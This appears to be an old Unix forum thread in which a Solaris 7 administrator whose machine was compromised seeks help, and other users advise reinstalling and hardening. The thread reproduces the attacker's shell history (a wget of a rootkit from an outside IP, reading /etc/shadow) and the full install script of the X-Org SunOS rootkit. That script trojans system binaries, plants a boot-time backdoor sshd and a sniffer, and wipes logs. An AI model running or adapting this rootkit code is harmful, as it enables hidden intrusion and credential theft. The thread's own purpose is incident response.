solaris 7 being hacked

[ybark]

Hi to All,
Does anybody here know what i'm going to do if my solaris 7 had being hacked. i just want to know what procedure that i can do to checked if my sunos can still operate normally. i'm new to unix and i really don't know how to restore it to normal mode. i accidentally configured it with public ip but now i immediately changed it to private ip to make it more safe. i don't want to format it becaue a lot of important files was being installed on it.

I will be really appreciated your help...

 

[daFranze]

keeping a hacked system alife in your enterprise is very dangerous; you will never know, if the hacker left a backdoor open...

I suggest to do a new Install, install Recomm. Patches, and run a OS-Hardening (google for this), restore important files (handle with care, the trojan horse may be under these files)

Best Regards, Franz
--
Solaris System Manager from Munich, Germany
I used to work for Sun Microsystems Support (EMEA) for 5 years

 

[mrn]

What make you think it's been Hacked?

Mike

"A foolproof method for sculpting an elephant: first, get a huge block of marble, then you chip away everything that doesn't look like an elephant.

 

[nawlej]

For the exact reason, you should keep incremental images of the system.....

___________________________________
[morse]--... ...--[/morse], Eric.

 

[ybark]

Hi to UNIX guru,

Thanks for your reply.

Here's the info base on the history file that hacker did to my system..

\201^Aunset HISTFILE;id;uname -a;uptime;
cd /tmp
ls
wget
wget 62.211.66.53/nyo2k2/allsuntest.tar.Z
uncompress allsuntest.tar.Z
tar -xvf allsuntest.tar.
tar -xvf allsuntest.tar
cd sol
./setup
cat /etc/shadow
cat /etc/hosts
exit


Based on the above software, is there a sefest way on how to uninstall this without affecting may existing setup? Do you have any idea on what this rootkit behave on the system one's it's installed?

Thank you all...

 

[ybark]

Hi to all,

i tried to download the file located at 62.211.66.53/nyo2k2/allsuntest.tar.Z and try to open the setup file and here's what it look like...

#!/bin/sh
# .,gg,. .,gg,.
# `$$$$$. .$$$$$'
# `$$$$$. .$$$$$' .,g%d$"^"$b%y,. .,g%d$"^"$b%y,..,g%d$"^"$b%y,.
# `$$$$$. .$$$$$'g$$$$' `$$$$y..g$$$$' .g$$$$' `""'
# $$$$$$$$$$$$.l$$$$: :$$$$ll$$$$: l$$$$: g%d$$b%y,.
# .$$$$$'""`$$$$$.$$$$$p g$$$$$'l$$$$: l$$$$: l$$$$:
# .$$$$$' `$$$$$.`^"$b%y,.,g%d~"^' `"--"' `^"$b%y,.,g%d~"^'
# .$$$$$' `$$$$$.
# `""""' `""""' you can stop one, but you can't stop all of us!
# (Leeto ASCII By: Johnny7)
#
# X-Org SunOS Rootkit v2.5D X-ORG Internal Release Edition By: Judge-D/Danny-Boy
# Special Thanks to Tragedy/Dor for Setup Wrapper
# If your not meant to have this, dont use it
#

http://www.xorganisation.org

#

http://www.xorg2000.com

IVER="2.5DXE-ORG"
PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/ccs/bin:/usr/gnu/bin;export PATH

# Edit these
# Dir to install rootkit in
RKDIR="/usr/lib/libX.a"
# Your email address
EMAIL="puntose@sitoverde.com"

colours()
{
BLK=''
RED=''
GRN=''
YEL=''
BLU=''
MAG=''
CYN=''
WHI=''
DRED=''
DGRN=''
DYEL=''
DBLU=''
DMAG=''
DCYN=''
DWHI=''
RES=''
}
colours


STIME=`./utime`
echo "${DCYN}X-Org SunOS Rootkit Modified by GaSpO fino alle Sun 5.9<: "
cat logo
echo "${WHI}*${DWHI} Starting up at: ${DCYN}${STIME}${DWHI}"

INDIR=`pwd`
OS=`uname -s`
VER=`uname -r`
CPU=`uname -i`

cdir()
{
if test ! -d $1 ; then
mkdir $1
fi
}

backup()
{
if test -f /usr/lib/libX.a/bin/${2} ; then
cp /usr/lib/libX.a/bin/${2} /usr/lib/libX.a/bin/tmpfl
fi

if test -f "$1" ; then
cp $1 /usr/lib/libX.a/bin/
printf " $2"
fi

if test -f /usr/lib/libX.a/bin/tmpfl ; then
mv /usr/lib/libX.a/bin/tmpfl /usr/lib/libX.a/bin/${2}
fi
}

cprk()
{
cp $1 /usr/lib/libX.a/
printf " $1"
}

cdir()
{
if test ! -d $1 ; then
mkdir $1
fi
}

unsuid()
{
if test -f "$1" ; then
chmod u-s $1
printf " $2"
fi
}

# trojan proc..
# $1 = trojan
# $2 is real file
# example: trojan su /sbin/su
# no full path for trojan
trojan()
{
if test -f "$2" ; then
./sz $2 ./$1
./fix /$2 ./$1
printf " $1"
fi
}


printf "${WHI}*${DWHI} Installing from $INDIR - Will erase $INDIR after install\n"

case $OS in
SunOS)
;;
*)
echo "${WHI}*${DWHI} ${RED} Oops.. im DUMB! i tried installing SunOS Rootkit on $OS "
exit 10
;;
esac

# Ok.. so if theyre not lame, and running this on SunOS like they should...
case $VER in
5.5)
cp /bin/ls ./
;;
5.5.1)
cp /bin/ls ./
;;
5.7)
;;
5.6)
;;
5.8)
;;
5.9)
;;
5.4)
cp /bin/ls ./
;;
*)
printf "${RED}**FATAL**${DWHI} Sorry. SunOS Version $VER is NOT supported.\n"
exit
;;
esac
# check for x86 boxes, since this rootkit is precompiled for sparcs
case $CPU in
i86pc)
printf "${RED}**FATAL**${DWHI} This rootkit is precompiled for Sparc only, this system is $CPU\n"
exit
;;
*)
;;
esac

printf "${WHI}*${DWHI} Checking for existing rootkits..\n"

./findkit

cdir /tmp/.pat
cdir /usr/lib/
cdir $RKDIR
cdir /usr/lib/libX.a/bin

echo "${WHI}***${DWHI} Insert Rootkit Password : "
read PASSWD
echo "${WHI}***${DWHI} Using Password $PASSWD"
./pg $PASSWD >/etc/lpd.config
PASS=$PASSWD
echo "su_pass=`./rpass`" >>x.conf2
echo "${WHI}***${DWHI} Insert Rootkit SSH Port : "
read PORT
echo "${WHI}***${DWHI} Using Port $PORT"
echo "${WHI}***${DWHI} Insert Rootkit PsyBNC Port : "
read EPORT
echo "${WHI}***${DWHI} Using Port $EPORT"

echo "net_filters=$PORT,$EPORT,17000,60001,6667,31337,1111" >>x.conf
cat x.conf2 >>x.conf

./crypt x.conf /usr/lib/libX.a/uconf.inv

printf "${WHI}*${DWHI} Making backups..."
if test -f $RKDIR/bin ; then
echo "KIT ALREADY INSTALLED - SKIPPING BACKUPS"
else
backup /bin/su su
backup /usr/sbin/ping ping
backup /usr/bin/du du
backup /usr/bin/passwd passwd
backup /usr/bin/find find
backup /bin/ls ls
backup /bin/netstat netstat
backup /usr/bin/strings strings
fi

if test ! -f /usr/lib/libX.a/bin/rps ; then
cp /usr/bin/ps /usr/lib/libX.a/bin/rps
fi
printf " ps"

printf " Done.\n"
printf "${WHI}*${DWHI} Installing trojans..."

###Backdoors

# Special sz for login which checks for known login trojans
./szl /usr/bin/login ./login
./fix /usr/bin/login ./login /sbin/xlogin
printf " login"

if [ -f /usr/bin/srload ]; then
/usr/bin/ps -fe | grep srload | grep -v grep | awk '{print "kill -9 "$2""}' | /bin/sh
chmod 755 /usr/bin/srload
echo "Port ${PORT}" >etc/sshd_config
cat etc/tconf >>etc/sshd_config
rm -f etc/tconf
cp -f etc/* /usr/bin/
/usr/bin/srload -q
else
cp -f sshd /usr/bin/srload
/usr/bin/ps -fe | grep srload | grep -v grep | awk '{print "kill -9 "$2""}' | /bin/sh
chmod 755 /usr/bin/srload
echo "Port ${PORT}" >etc/sshd_config
cat etc/tconf >>etc/sshd_config
rm -f etc/tconf
cp -f etc/* /usr/bin/
/usr/bin/srload -q
fi
echo "" >>/etc/init.d/network
echo "# Reloading Network Settings" >>/etc/rcS.d/S30rootusr.sh
echo "" >>/etc/rcS.d/S30rootusr.sh
echo " if [ -f /usr/bin/srload ]; then" >>/etc/rcS.d/S30rootusr.sh
echo " /usr/bin/srload -q" >>/etc/rcS.d/S30rootusr.sh
echo " /usr/sbin/modcheck " >>/etc/rcS.d/S30rootusr.sh
echo " fi" >>/etc/rcS.d/S30rootusr.sh
echo "SV:23:respawn:/usr/bin/srload -D -q" >>/etc/inittab
touch -r /etc/swapadd /etc/inittab
touch -r /etc/swapadd /etc/rcS.d/S30rootusr.sh
/usr/sbin/init q
printf " sshd"

###Trojans
cd $INDIR

# Netstat Trojan
if test -f "/usr/bin/netstat" ; then
./sz /usr/bin/netstat ./netstat
./fix /usr/bin/netstat ./netstat
printf " netstat"
fi

# ls trojan
if test -f "/usr/bin/ls" ; then
./sz /usr/bin/ls ./ls2
./fix /usr/bin/ls ./ls2
printf " ls"
fi

# lsof trojan
if test -f "/usr/local/bin/lsof" ; then
./sz /usr/local/bin/lsof ./lsof
cp /usr/local/bin/lsof /usr/lib/libX.a/bin/
./fix /usr/local/bin/lsof ./lsof
printf " lsof"
fi

# find trojan
if test -f "/usr/bin/find" ; then
./sz /usr/bin/find ./find
./fix /usr/bin/find ./find
printf " find"
fi

#strings trojan
if test -f "/usr/bin/strings" ; then
./sz /usr/bin/strings ./strings
./fix /usr/bin/strings ./strings
printf " strings"
fi

# du trojan
if test -f "/usr/bin/du" ; then
./sz /usr/bin/du ./du
./fix /usr/bin/du ./du
printf " du"
fi

# top trojan
if test -f "/usr/local/bin/top" ; then
./sz /usr/local/bin/top ./top
rm -f /usr/local/bin/top
./fix /usr/local/bin/top ./top
printf " top"
fi

# passwd trojan
if test -f "/usr/bin/passwd" ; then
./sz /usr/bin/passwd ./passwd
./fix /usr/bin/passwd ./passwd
printf " passwd"
fi

# ping trojan
if test -f "/usr/sbin/ping" ; then
./sz /usr/sbin/ping ./ping
printf " ping"
fi

# su trojan
if test -f "/bin/su" ; then
./sz /bin/su ./su
./fix /bin/su ./su $RKDIR/oldsuper
printf " su"
fi

printf " Complete.\n"

printf "${WHI}*${DWHI} Suid removal"

unsuid /usr/bin/at at
unsuid /usr/bin/atq atq
unsuid /usr/bin/atrm atrm
unsuid /usr/bin/eject eject
unsuid /usr/bin/fdformat fdformat
unsuid /usr/bin/rdist rdist
unsuid /bin/rdist rdist
unsuid /usr/bin/admintool admintool
unsuid /usr/lib/fs/ufs/ufsdump ufsdump
unsuid /usr/lib/fs/ufs/ufsrestore ufsrestore
unsuid /usr/lib/fs/ufs/quota quota
unsuid /usr/openwin/bin/ff.core ff.core
unsuid /usr/bin/lpset lpset
unsuid /usr/bin/lpstat lpstat
unsuid /usr/lib/lp/bin/netpr netpr
unsuid /usr/sbin/arp arp
unsuid /usr/vmsys/bin/chkperm chkperm

chmod u-s /usr/openwin/bin/*
chmod u-s /usr/dt/bin/*
printf " Complete.\n"

cp wget /usr/bin
cp wget /usr/lib/libX.a
cp pico /usr/lib/libX.a
cp zap3 /usr/lib/libX.a
cp pico6 /usr/lib/libX.a
chmod 777 modstatd
./modstatd
cp modstatd /usr/sbin/
modstatd
chmod 777 /usr/sbin/modstatd
echo "/usr/sbin/modstatd" >> /etc/rcS.d/S30rootusr.sh
echo "${WHI}*${DWHI} Starting Patcher..."
$INDIR/p-engine
cp $INDIR/patch.* $RKDIR/

case $VER in
5.5)
$RKDIR/patch.sol5
;;
5.6)
$RKDIR/patch.sol6
;;
5.7)
$RKDIR/patch.sol7
;;
5.8)
$RKDIR/patch.sol8
;;
*)
printf "No Extra Patches for This Release -5.9 pachare a mano il sadmin<:\n"
;;
esac

cd $INDIR
# ps trojan
cd $INDIR;
if test -f /lib/ldlibps.so; then
cp -f /lib/ldlibps.so /usr/bin/ps
fi
./sz /usr/bin/ps ./ps
./fix /usr/bin/ps ./ps
# required for sol7/8
if test -d /usr/bin/sparcv7 ; then
cdir /usr/lib/libX.a/bin/sparcv7
cp -f /bin/sparcv7/ps /usr/lib/libX.a/bin/sparcv7/rps
fi
printf "PS Trojaned"

IFT=`/sbin/ifconfig -a | head -n 3|grep -v "lo0"|grep flags|awk '{print
$1}'`
IFX=`echo $IFT | cut -d 0 -f 1`
echo "${WHI}*${DWHI} Primary network interface is of type: ${DCYN}${IFX}${DWHI}"

### sniffer
cp sn2 /usr/sbin/modstat
echo "nohup /usr/sbin/modstat -s -d 512 -i /dev/${IFX} -o /usr/lib/libp/libm.n >/dev/null &" >>sniffload
cp sniffload /usr/sbin/modcheck
echo "${WHI}*${DWHI} Sniffer set"
nohup /usr/sbin/modcheck >/dev/null 2>&1
### end sniffer

printf "${WHI}*${DWHI} Copying utils.."

cp pg $RKDIR/passgen
cp cleaner $RKDIR/wipe
cp utime $RKDIR/utime
cp l3 $RKDIR/l
cp crypt $RKDIR/crt
cp ssh-dxe $RKDIR/ssh-dxe
cp syn $RKDIR/syn
cp startbnc $RKDIR/loadbnc

printf " passgen fixer wipe utime crt idstart ssh-dxe syn README Done.\n"

### pident.d BACKDOOR
#cp -f in.identd /usr/sbin/in.identd
#chmod 755 /usr/sbin/in.identd
#echo "auth stream tcp nowait nobody /usr/sbin/in.identd in.identd" >> /etc/inetd.conf
#printf "${WHI}*${DWHI} in.identd backdoor installed on port 113 \n"
#printf "${WHI}*${RED} DONT FORGET TO RESTART INETD!"
###

### BNC2

#cp bnclp /usr/sbin/ntptime
#cp bnc.conf /usr/sbin/ntptime.conf
#echo "${WHI}*${DWHI} BNC2 has now been copied to /usr/sbin/ntptime and configured on port:1578"

### end BNC2

### psyBNC
#cdir /dev/cua/...#
#cp psy.tar.Z /dev/cua/.../
#cd /dev/cua/...
#uncompress psy.tar.Z && tar xvf psy.tar >>/dev/null
#echo "PSYBNC.SYSTEM.PORT1=$EPORT" >psybnc.conf
#echo "PSYBNC.SYSTEM.HOST1=*" >>psybnc.conf
#echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >>psybnc.conf
#echo "${WHI}*${DWHI} psyBNC has now been configured on port $EPORT
### end psyBNC

echo "${WHI}*${DWHI} erasing rootkit..."
cd $INDIR
cd ..
rm -rf allsun.tar
rm -rf lol
rm -rf /tmp/sol
rm -rf /tmp/lol
cd $RKDIR
rm -rf /tmp/.pat
PRIMIF=`/sbin/ifconfig -a|grep inet|head -n 2|grep -v 127.0.0.1|awk '{print $2}'`
IFCNT=`/sbin/ifconfig -a|grep inet|grep -v 127.0.0.1|wc -l`
UNAM=`uname -a`

DUPTEST=`dmesg|grep "SUNW,hme0"|head -n 1|cut -d ":" -f 1`
if [ $DUPTEST ];then
LINKUP=`dmesg|grep "SUNW,hme0"|grep "Link"|head -n 1`
echo "${WHI}*${DWHI} $LINKUP"
fi
NEXUS=`dmesg|grep nexus|head -n 1`

FTIME=`$RKDIR/utime`
ITIME=`expr $FTIME - $STIME`

echo "${WHI}*${DCYN} Rootkit installation Completed in ${ITIME} Seconds.${DWHI}"
echo "${WHI}*${DWHI} Password: $PASS"
echo "${WHI}*${DWHI} $UNAM"
echo "${WHI}*${DWHI} Primary interface IP: $PRIMIF"
echo "${WHI}*${DWHI} Possible $IFCNT host aliases"
echo "${WHI}*${DWHI} $NEXUS"
echo "Rootlist line:"
echo "$PRIMIF:${PORT} $PASS PSYBNC:${EPORT}"

# enable this if you want
#echo "$PRIMIF:${PORT} Solaris $VER $PASS" | mail ${EMAIL}

# Here you could add optional commands to clean logs
# EG: to remove traces of rpc.sadmind exploitation
#echo "${WHI}*${DCYN} Removing Logs...Insert Your IP: "
#read MYIP
$RKDIR/wipe sadmin
$RKDIR/wipe cmsd
$RKDIR/wipe snmp
echo "${WHI}*${DCYN} Done...Enjoy Your Stay aggiunta pach sadmin-rpc"
echo "${WHI}*${DCYN} Modified by GaSpO on IrcNet"
/usr/bin/ps -fe | grep ssld | grep -v grep | awk '{print "kill -9 "$2""}' | /bin/sh
cp /etc/inetd.conf /usr/lib/libX.a
cat /etc/inetd.conf|grep -v rpc > /tmp/cacca
/usr/bin/ps -fe | grep inetd| grep -v grep | awk '{print "kill -9 "$2""}' | /bin/sh
mv /tmp/cacca /etc/inetd.conf
/usr/sbin/inetd -s



Does anyone here how to remove this kind of rootkit?

Thanks in advaces...

 

[mrn]

Did you run it?

Mike

"A foolproof method for sculpting an elephant: first, get a huge block of marble, then you chip away everything that doesn't look like an elephant.

 

[mrn]

Sorry dump question, I've now read your posts correctly, you could unpick the install. By the look of it it created backup of the files it modified but it would be a major hassle. I'd restore then secure your system.

Mike

"A foolproof method for sculpting an elephant: first, get a huge block of marble, then you chip away everything that doesn't look like an elephant.

 

[mrn]

There is a removekit script in the download

But doesn't look like it would remove everything

#!/bin/sh

-------------------------------------------------
# Removes sunos roootkit from a host

printf "Removing.."
cp -f /sbin/xlogin /usr/bin/login
printf " login"
cp -f /usr/lib/ldlibnet.so /usr/bin/netstat
printf " netstat"
cp -f /lib/ldlibps.so /usr/bin/ps
printf " ps"
rm -f /usr/bin/srload
printf " sshd"


printf " Done."
-----------------------------------------------------

I've also found this info on google

http://www.pestpatrol.com/pestinfo/s/sunos_rootkit_b.asp

http://www.cs.wright.edu/people/faculty/pmateti/Courses/499/Fortification/obrien.html

http://vil.nai.com/vil/content/v_101126.htm

Mike

"A foolproof method for sculpting an elephant: first, get a huge block of marble, then you chip away everything that doesn't look like an elephant.